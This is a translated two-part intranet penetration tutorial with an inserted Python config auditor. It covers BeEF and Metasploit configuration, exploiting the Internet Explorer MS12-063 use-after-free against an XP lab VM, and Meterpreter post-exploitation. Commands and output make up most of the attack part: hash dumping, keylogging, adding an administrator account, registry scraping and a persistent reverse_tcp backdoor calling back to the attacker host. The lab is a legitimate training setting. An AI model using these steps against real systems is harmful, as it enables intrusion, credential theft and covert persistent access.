        # NOTE: you must change the Gemfile adding a gem require line like:
        #   gem "dm-postgres-adapter"
        # or
        #   gem "dm-mysql-adapter"
        # if you want to switch drivers from sqlite to postgres (or mysql).
        # Finally, run a 'bundle install' command and start BeEF.
        driver: "sqlite"
        # db_file is only used for sqlite
        db_file: "db/beef.db"
        # db connection information is only used for mysql/postgres
        db_host: "localhost"
        db_port: 5432
        db_name: "beef"
        db_user: "beef"
        db_passwd: "beef123"
        db_encoding: "UTF-8"
    # Credentials to authenticate in BeEF. Used by both the RESTful API and the Admin_UI extension
    credentials:
        user:   "beef"
        passwd: "beef"
    # Autorun modules as soon the browser is hooked.
    # NOTE: only modules with target type 'working' or 'user_notify' can be run automatically.
    autorun:
        enable: true
        # set this to FALSE if you don't want to allow auto-run execution for modules with target->user_notify
        allow_user_notify: true
    crypto_default_value_length: 80
    # Enable client-side debugging
    client:
        debug: false
    # You may override default extension configuration parameters here
    extension:
        requester:
            enable: true
        proxy:
            enable: true
        metasploit:
            enable: true
        social_engineering:
            enable: true
        evasion:
            enable: false
        console:
             shell:
                enable: false
        ipec:
            enable: true

vim /usr/share/beef-xss/extensions/metasploit/config.yaml
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# Enable MSF by changing extension:metasploit:enable to true
# Then set msf_callback_host to be the public IP of your MSF server
#
# Ensure you load the xmlrpc interface in Metasploit
# msf > load msgrpc ServerHost=10.211.55.2 Pass=abc123 ServerType=Web
# Please note that the ServerHost parameter must have the same value of host and callback_host variables here below.
# Also always use the IP of your machine where MSF is listening.
beef:
    extension:
        metasploit:
            name: 'Metasploit'
            enable: true
            host: "172.16.244.129"
            port: 55552
            user: "msf"
            pass: "abc123"
            uri: '/api'
            ssl: false
            ssl_version: 'SSLv3'
            ssl_verify: true
            callback_host: "172.16.244.129"
            autopwn_url: "autopwn"
            auto_msfrpcd: false
            auto_msfrpcd_timeout: 120
            msf_path: [ 
              {os: 'osx', path: '/opt/local/msf/'},
              {os: 'livecd', path: '/opt/metasploit-framework/'},
              {os: 'bt5r3', path: '/opt/metasploit/msf3/'},
              {os: 'bt5', path: '/opt/framework3/msf3/'},
              {os: 'backbox', path: '/opt/metasploit3/msf3/'},
              {os: 'win', path: 'c:\\metasploit-framework\\'},
              {os: 'custom', path: '/usr/share/metasploit-framework/'}
            ]
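The two config files above also show the settings that decide who can reach a BeEF instance: permitted_ui_subnet, the beef/beef credentials, plain HTTP bound to 0.0.0.0, the sqlite-irrelevant db_passwd, and the msgrpc password abc123 shared with the Metasploit extension. The Python below is an added example, not part of the article or of BeEF, that parses the key/value subset of such a file without a YAML library and reports those defaults, so that a lab instance is not left reachable by anyone on the network. CONFIG is a constructed excerpt merging the relevant keys of both files shown above.

```python
# Added example, not part of the article or of BeEF: a minimal parser for the
# nested key/value subset of BeEF's config.yaml plus checks for the settings in
# the article that leave an instance exposed. No third-party YAML library is used.

# Constructed excerpt merging the relevant keys of the two config files above.
CONFIG = """\
beef:
    version: '0.4.4.5-alpha'
    restrictions:
        # subnet of browser ip addresses that can hook to the framework
        permitted_hooking_subnet: "0.0.0.0/0"
        permitted_ui_subnet: "0.0.0.0/0"
    http:
        host: "0.0.0.0"
        port: "3000"
        panel_path: "/ui/panel"
        https:
            enable: false
            key: "beef_key.pem"
    database:
        driver: "sqlite"
        db_passwd: "beef123"
    credentials:
        user:   "beef"
        passwd: "beef"
    extension:
        metasploit:
            enable: true
            pass: "abc123"
        console:
             shell:
                enable: false
"""


def parse_simple_yaml(text):
    """Parse nested 'key: value' lines by indentation into dicts (no lists or anchors)."""
    root = {}
    stack = [(-1, root)]  # (indent, mapping) of the enclosing nodes
    for raw in text.splitlines():
        stripped = raw.strip()
        if not stripped or stripped.startswith("#"):
            continue
        indent = len(raw) - len(raw.lstrip())
        line = stripped.split(" #", 1)[0]  # drop trailing comments
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        while stack[-1][0] >= indent:  # close nodes that are not our parent
            stack.pop()
        parent = stack[-1][1]
        if value == "":
            node = {}
            parent[key] = node
            stack.append((indent, node))
        else:
            parent[key] = value.strip("\"'")  # scalars stay strings
    return root


def lookup(cfg, path, default=None):
    """Fetch a dotted path such as beef.http.port from the parsed tree."""
    node = cfg
    for part in path.split("."):
        if not isinstance(node, dict) or part not in node:
            return default
        node = node[part]
    return node


def audit_beef_config(cfg):
    """Return (severity, path, message) for the exposure-relevant defaults."""
    findings = []
    if lookup(cfg, "beef.restrictions.permitted_ui_subnet") == "0.0.0.0/0":
        findings.append(("high", "beef.restrictions.permitted_ui_subnet",
                         "admin UI reachable from any address"))
    if lookup(cfg, "beef.credentials.user") == "beef" and lookup(cfg, "beef.credentials.passwd") == "beef":
        findings.append(("high", "beef.credentials", "default beef/beef credentials"))
    if lookup(cfg, "beef.http.https.enable") == "false" and lookup(cfg, "beef.http.host") == "0.0.0.0":
        findings.append(("medium", "beef.http.https.enable",
                         "panel and hook served over plain HTTP on all interfaces"))
    if lookup(cfg, "beef.database.db_passwd") == "beef123":
        findings.append(("low", "beef.database.db_passwd",
                         "default database password (used only for mysql/postgres)"))
    if lookup(cfg, "beef.extension.metasploit.enable") == "true" and \
            lookup(cfg, "beef.extension.metasploit.pass") == "abc123":
        findings.append(("high", "beef.extension.metasploit.pass",
                         "msgrpc password is the documented default"))
    return findings


if __name__ == "__main__":
    for severity, path, message in audit_beef_config(parse_simple_yaml(CONFIG)):
        print(f"[{severity}] {path}: {message}")
```

Restricting permitted_ui_subnet to the tester's own address and replacing the two default passwords clears the high findings; the plain-HTTP finding is what the https block in the first file is for.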

Original:

{os: 'custom', path: ''}

Change to:

{os: 'custom', path: '/usr/share/metasploit-framework/'}

Change the host and callback_host parameters to the BeEF host's IP.

Restart the postgresql and metasploit services:

service postgresql restart && service metasploit restart

msfconsole # start Metasploit
load msgrpc ServerHost=172.16.244.129 Pass=abc123

Restart BeEF.

When BeEF starts it reports that 246 Metasploit exploits were loaded; with MSF updated to the latest version there should be five or six hundred.

Enter the BeEF back end (the count inexplicably became 245 =。=!)

use exploit/windows/browser/ie_execcommand_uaf
show options
set srvhost 172.16.244.129
exploit/run

The target machine is forcibly redirected to the listening URL.

MSF picks up the connection (but it seems the XP virtual machine had this vulnerability patched, so no session was created).

If XP is unpatched, i.e. the vulnerability this exploit targets is present, a session is created here:

sessions -i 1

screenshot: capture the screen of the phished host to a local file

sysinfo: view system information

hashdump: dump the target host's user hashes

0x06 More Meterpreter commands

References:

Meterpreter post-exploitation commands

Metasploit Meterpreter command cheat sheet

From the previous article, "Intranet penetration I: getting into the intranet through an XSS vulnerability",

0x01 Filling the gap:

Here I fill in the gap left in the previous article:

We used the exploit/windows/browser/ie_execcommand_uaf exploit for Internet Explorer, but after running it we found that although the target host was redirected, there was an error:

(continued from part one) The target machine is forcibly redirected to the listening URL.

MSF picks up the connection

(but it seems the XP virtual machine had this vulnerability patched, so no session was created)

I searched for the cause for a long time afterwards, and with Mickey's guidance finally found the reason for the error:

In msf, enter exploit/windows/browser/ie_execcommand_uaf

0x02 Finding the problem:

Run info to view the exploit's details. It turns out this exploit targets IE7 and IE8 on XP SP3 and Vista, and IE8 and IE9 on Windows 7.

msf exploit(ie_execcommand_uaf) > info
       Name: MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability 
     Module: exploit/windows/browser/ie_execcommand_uaf
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Good
Provided by:
  unknown
  eromang
  binjo
  sinn3r <sinn3r@metasploit.com>
  juan vazquez <juan.vazquez@metasploit.com>
Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   IE 7 on Windows XP SP3
  2   IE 8 on Windows XP SP3
  3   IE 7 on Windows Vista
  4   IE 8 on Windows Vista
  5   IE 8 on Windows 7
  6   IE 9 on Windows 7
Basic options:
  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  OBFUSCATE   false            no        Enable JavaScript obfuscation
  SRVHOST     172.16.244.129   yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
  SRVPORT     8080             yes       The local port to listen on.
  SSL         false            no        Negotiate SSL for incoming connections
  SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
  SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  URIPATH                      no        The URI to use for this exploit (default is random)
Payload information:
Description:
  This module exploits a vulnerability found in Microsoft Internet 
  Explorer (MSIE). When rendering an HTML page, the CMshtmlEd object 
  gets deleted in an unexpected manner, but the same memory is reused 
  again later in the CMshtmlEd::Exec() function, leading to a 
  use-after-free condition. Please note that this vulnerability has 
  been exploited in the wild since Sep 14 2012. Also note that 
  presently, this module has some target dependencies for the ROP 
  chain to be valid. For WinXP SP3 with IE8, msvcrt must be present 
  (as it is by default). For Vista or Win7 with IE8, or Win7 with IE9, 
  JRE 1.6.x or below must be installed (which is often the case).
References:
  http://cvedetails.com/cve/2012-4969/
  http://www.osvdb.org/85532
  http://www.microsoft.com/technet/security/bulletin/MS12-063.mspx
  http://technet.microsoft.com/en-us/security/advisory/2757760
  http://eromang.zataz.com/2012/09/16/zero-day-season-is-really-not-over-yet/
  http://blog.vulnhunt.com/index.php/2012/09/17/ie-execcommand-fuction-use-after-free-vulnerability-0day/

Then I quietly downloaded XP SP3 and installed IE7 (a freshly installed XP SP3 comes with IE6).

(Install, reboot, redo the steps from part one... details omitted)

0x03 EXP successful:

Finally, it returned successful!

sessions:
sessions -i 1

sysinfo ipconfig ps hashdump...

0x04 Common commands:

Screenshot:

screenshot

Keylogging:

meterpreter > run post/windows/capture/keylog_recorder 
[*] Executing module against SPRITEKI-674621
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/loot/20150315141552_default_172.16.244.136_host.windows.key_879494.txt
[*] Recording keystrokes...
^C[*] Saving last few keystrokes...
[*] Interrupt 
[*] Stopping keystroke sniffer...

Run cmd:

meterpreter > shell

Add a user:

net user name password /add

Add the user to the administrators group:

net localgroup administrators name /add

Since this is an intranet, enabling 3389 would be pointless anyway.

Kill antivirus:

meterpreter > run scraper
[*] New session on 172.16.244.136:1114...
[*] Gathering basic system information...
[*] Error dumping hashes: Rex::Post::Meterpreter::RequestError priv_passwd_get_sam_hashes: Operation failed: Access is denied.
[*] Obtaining the entire registry...
[*]  Exporting HKCU
[*]  Downloading HKCU (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\FQvPwGSl.reg)
[*]  Cleaning HKCU
[*]  Exporting HKLM
[*]  Downloading HKLM (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\HFQhdyFt.reg)
[*]  Cleaning HKLM
[*]  Exporting HKCC
[*]  Downloading HKCC (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\iNNrwzBu.reg)
[*]  Cleaning HKCC
[*]  Exporting HKCR
[*]  Downloading HKCR (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\QBVFVWVP.reg)
[*]  Cleaning HKCR
[*]  Exporting HKU
[*]  Downloading HKU (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Vwvxmugh.reg)
[*]  Cleaning HKU
[*] Completed processing on 172.16.244.136:1114...

Persistence:

meterpreter > run persistence -X -i 20 3376 -r 172.16.244.129
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/SPRITEKI-674621_20150315.5511/SPRITEKI-674621_20150315.5511.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=172.16.244.129 LPORT=4444
[*] Persistent agent script is 609466 bytes long
[+] Persistent Script written to C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\lBsbPnkcYJvv.vbs
[*] Executing script C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\lBsbPnkcYJvv.vbs
[+] Agent executed with PID 1112
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShFzEOxwbuI
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShFzEOxwbuI

use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.244.129
set LPORT 4444
exploit

Calling the Windows API from meterpreter, with a "Hello world" message box as the example:

meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client
>> client.railgun.user32.MessageBoxA(0,"hello","world","MB_OK")

 

0x05 More Meterpreter commands

References:

Meterpreter post-exploitation commands

Metasploit Meterpreter command cheat sheet

0x06 Thanks

Thanks to the all-powerful Mickey and Xuanhun (玄魂)

Sprite (雪碧) http://weibo.com/520613815

2015-03-19

Original articles:

http://bobao.360.cn/learning/detail/300.html

http://bobao.360.cn/learning/detail/312.html